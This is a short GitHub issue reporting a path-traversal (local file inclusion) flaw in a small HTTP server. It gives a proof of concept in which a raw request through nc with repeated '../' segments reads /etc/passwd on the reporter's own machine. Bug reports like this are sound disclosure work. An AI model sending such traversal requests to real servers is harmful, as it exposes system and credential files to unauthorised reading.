Skip to content

LFI vurnability #1

New issue
New issue
Open
Open
LFI vurnability#1
@Cotix

Description

@Cotix
Cotix
opened on Apr 23, 2015

It is possible to read every file on the system using ../

try:
[cotix@lithium ~]$ nc localhost 8080
GET /../../../../../../../etc/passwd HTTP/1.0

HTTP/1.0 200 OK
Content-Type: text/plain

root: x:0:0:root:/root:/bin/bash
... rest of my /etc/passwd file

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions